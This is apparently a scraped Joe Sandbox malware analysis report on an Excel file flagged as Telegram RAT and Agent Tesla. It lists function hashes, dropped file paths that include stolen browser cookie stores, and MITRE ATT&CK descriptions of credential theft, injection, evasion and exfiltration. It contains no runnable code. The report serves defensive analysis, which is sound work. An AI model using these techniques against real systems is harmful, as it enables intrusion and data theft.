Uniqueness Score: -1.00%

Function 00380B18 Relevance: .5, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df89b7556789861a45ec08b586cc43689f134b2b30c5ab9d08100fb579377439
Instruction ID: 07d9c7e9f3fadec594bb206db704c3ae53f96c42edce06fc81159da626af669a
Opcode Fuzzy Hash: df89b7556789861a45ec08b586cc43689f134b2b30c5ab9d08100fb579377439
Instruction Fuzzy Hash: 78128B30B00301CFC719EF64E994A6E73AAFB94305F248869D5468B798DF35EC86CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00380A10 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54003a3f988f97b62ec2cc62944923bb12a253960b7eb63ff50f5279a2f3fc81
Instruction ID: 16d842fa148dddb64acbbd97d83ab38cc558e89363996fabd9f412a8e813e826
Opcode Fuzzy Hash: 54003a3f988f97b62ec2cc62944923bb12a253960b7eb63ff50f5279a2f3fc81
Instruction Fuzzy Hash: 9B3155347082908FC749EF78C85896D37E2AF8A60931244B8E516CF771DB32DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00380A20 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea832248c32948158c050549560d0d0c77f29aac1aa0a7ea438096d3e6b761d
Instruction ID: 8bc8ba66b21af59c00920dd6e4e649e8717a178020344cfba6768c555e82d1c5
Opcode Fuzzy Hash: eea832248c32948158c050549560d0d0c77f29aac1aa0a7ea438096d3e6b761d
Instruction Fuzzy Hash: B02123347442508FC759AB78D85896D33E2AF8AA1932244B8E51ACF771DF32DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003812A8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761978efc7fd1de32066882ca94f58e2ad3e7a6341c6e7bb91f290ecf132cd69
Instruction ID: e0441f334da93e02652e053f7a6268444ff5cbae64ad4deaf9f35b71fd0de14e
Opcode Fuzzy Hash: 761978efc7fd1de32066882ca94f58e2ad3e7a6341c6e7bb91f290ecf132cd69
Instruction Fuzzy Hash: 2F11B930F041549FC704EBB8E45479D3BAADF85304F014469D615EB799DF309E068B95

Uniqueness

Uniqueness Score: -1.00%

Function 003813C8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d08145b1c40619f1a47dd90fc01205ca1596f9647e72e9c4fb20803b423ab16
Instruction ID: 9b0ba06572fd6f9e07ca8b4255eb3aaf227cc369f86f9bcaa6c636f27124c908
Opcode Fuzzy Hash: 8d08145b1c40619f1a47dd90fc01205ca1596f9647e72e9c4fb20803b423ab16
Instruction Fuzzy Hash: 8E118E35E00245DFCB41EFA4D9848EAFBF5FF8A31071586A6E504EB221EB30A915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003813D8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef6e0cecf6456824e6dabe06a10005d54b7518ae2bf0815457090071708105a
Instruction ID: b4eb74850076469819b3b1c70c7e25746c19032718799c2b92e114936b3a7f7d
Opcode Fuzzy Hash: 5ef6e0cecf6456824e6dabe06a10005d54b7518ae2bf0815457090071708105a
Instruction Fuzzy Hash: EA015E76E10205DFCB40EFA4E9848EEFBB5FF893107108666E515E7225EB31A915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0038077C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a295779862aa1da7f3df331902b581286b8bb3c519d254e318702ef574791df0
Instruction ID: 8398342ce8c9218f71e08c948a920d701b77f8924531ed9529c99788483adbc9
Opcode Fuzzy Hash: a295779862aa1da7f3df331902b581286b8bb3c519d254e318702ef574791df0
Instruction Fuzzy Hash: 5DF03070A00315CFEB19EFA4C5587AD7BF0AF48314F2508A9D442E77A1CB759C88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00380479 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b093045b4ff09d77e0759c2a3e3ada5cdab75ce3264c639f8aebc92dfef6de
Instruction ID: 61d926f2fc8210db3980e49d14d51f3e83e7895e32528224a9cca37517f72237
Opcode Fuzzy Hash: b6b093045b4ff09d77e0759c2a3e3ada5cdab75ce3264c639f8aebc92dfef6de
Instruction Fuzzy Hash: E7E06D71C082589FCB90EFBC99042CABFF4AF05210F5004AAD945D7202E27496148BC1

Uniqueness

Uniqueness Score: -1.00%

Function 00380488 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.961086670.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_380000_BINGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6076ff142ecfdfdbc20c3198eaf07a15bc30d0ae7e7329740a2ae2b2769ea40
Instruction ID: 624b602fc060fd0430ec597d3198f736b4cd62d4a95d2715ed5659b525efa558
Opcode Fuzzy Hash: b6076ff142ecfdfdbc20c3198eaf07a15bc30d0ae7e7329740a2ae2b2769ea40
Instruction Fuzzy Hash: 53D067B1D002299F8B80EFF999051DEBBF8EE09250B5045A6DA5AE3604E6745A148BD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 00001.LPCD2022.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\dropped.exe

C:\Users\user\AppData\Roaming\BINGO\BINGO.exe

C:\Users\user\AppData\Roaming\k1sqi2ag.u2m\Chrome\Default\Cookies

C:\Users\user\AppData\Roaming\k1sqi2ag.u2m\Firefox\Profiles\7xwghk55.default\cookies.sqlite

Static File Info

General

File Icon

Static OLE Info

General

OLE File "00001.LPCD2022.xls"

Indicators

Summary

Document Summary

Windows Analysis Report
00001.LPCD2022.xls

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre